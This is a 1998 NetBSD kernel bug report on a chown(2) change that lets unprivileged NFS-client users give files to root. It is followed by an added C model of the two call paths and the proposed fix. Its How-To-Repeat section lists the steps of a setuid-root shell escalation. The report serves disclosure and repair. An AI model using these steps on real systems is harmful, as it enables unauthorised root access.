Subject: kern/5106: recent chown(2) change introduces security hazard
To: None <gnats-bugs@gnats.netbsd.org, jaw@Op.Net>
From: Jeff Weisberg <jaw@Op.Net>
List: netbsd-bugs
Date: 03/03/1998 11:19:51
>Number: 5106
>Category: kern
>Synopsis: recent chown(2) change dangerous in heterogeneous nfs environment
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: kern-bug-people (Kernel Bug People)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Tue Mar 3 08:20:00 1998
>Last-Modified:
>Originator:
>Organization:
>Release: current - 1998/02
>Environment:
System: NetBSD pisarro.op.net 1.3C NetBSD 1.3C (PISARRO) #57: Wed Feb 18 09:41:24 EST 1998 jaw@pisarro.op.net:/usr/src/NetBSD-current/src/sys/arch/sparc/compile/PISARRO sparc
>Description:
the test as to whether we should actually change the owner of a file
was recently moved from "ufs_vnops.c/ufs_chown()" to
"vfs_syscalls.c/change_owner()"
consider the case of mounting a filesystem from a NetBSD-current based
box to a system not NetBSD-current based (either NetBSD-older, or any
non-NetBSD system):
I can now, as a non-privileged user on the 2nd system, chown(2) a
file mounted from the NetBSD-current box successfully, as we now
take the following path through kernel-land:
chown() -> sys_chown() -> change_owner() -> nfs_setattr() ---->
to the current box:
nfsrv_setattr() -> ufs_setattr() -> ufs_chown()
the "don't let non-root people chown things" test is avoided completely.
this can be exploited to gain root privs.
>How-To-Repeat:
older % cd /dir-mounted-from-netbsd-current
older % cp /bin/sh .
older % chmod u+s sh
older % chown root:wheel sh
older % ls -lg sh
-rwsrwxr-x 1 root wheel 6113 Mar 1 10:13 sh
older % ./sh
older #
[note: chown(8) does not permit users to run it, a simple c or perl
prog replacement will suffice]
>Fix:
place the test back in the ufs layer. security-holics would likely suggest
(and I'd agree with them) that the test should be done in *both* places.
>Audit-Trail:
>Unformatted:
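As an added illustration (not part of this report or of NetBSD's own code), a small C model of the two entry paths the report names, with the privilege test present either only in the syscall layer or in both layers as the Fix proposes; the struct and function names are placeholders that mirror the call chain above.

```c
/* Constructed model (not NetBSD code) of where the "only root may give a
 * file away" test sits, driven through the two entry paths in the report. */
#include <errno.h>
#include <stdbool.h>
#include <sys/types.h>
struct cred { uid_t uid; };              /* caller's credentials */
struct vnode { uid_t uid; gid_t gid; };  /* file ownership */
/* true: ufs_chown() repeats the test, as the report's Fix proposes. */
static bool ufs_layer_checks = false;

/* The rule: a non-root caller may not change a file's uid.
 * (Group-membership rules are left out of this model.) */
static int chown_permitted(const struct cred *cr, const struct vnode *vp, uid_t newuid)
{
    if (cr->uid == 0) return 0;
    return newuid == vp->uid ? 0 : EPERM;
}

/* ufs layer: where the test used to live. */
static int ufs_chown(struct vnode *vp, uid_t uid, gid_t gid, const struct cred *cr)
{
    if (ufs_layer_checks && chown_permitted(cr, vp, uid) != 0) return EPERM;
    vp->uid = uid;
    vp->gid = gid;
    return 0;
}

/* Syscall layer: chown(2) -> sys_chown() -> change_owner(); the test is here now. */
static int change_owner(struct vnode *vp, uid_t uid, gid_t gid, const struct cred *cr)
{
    int err = chown_permitted(cr, vp, uid);
    return err ? err : ufs_chown(vp, uid, gid, cr);
}

/* NFS server: nfsrv_setattr() -> ufs_setattr() -> ufs_chown(), never touching change_owner(). */
static int nfsrv_setattr(struct vnode *vp, uid_t uid, gid_t gid, const struct cred *cr)
{
    return ufs_chown(vp, uid, gid, cr);
}

/* An unprivileged caller tries, over each path, to hand its file to root.
 * Returns 0 if the change went through (check bypassed) or EPERM if refused. */
static int chown_to_root_result(bool via_nfs, bool fix_applied)
{
    struct cred user = { .uid = 1000 };              /* constructed non-root user */
    struct vnode file = { .uid = 1000, .gid = 100 }; /* file owned by that user */
    ufs_layer_checks = fix_applied;
    return via_nfs ? nfsrv_setattr(&file, 0, 0, &user)
                   : change_owner(&file, 0, 0, &user);
}
```

With the test only in change_owner(), the NFS server path returns 0 (the ownership change goes through); once ufs_chown() also checks, both paths refuse with EPERM.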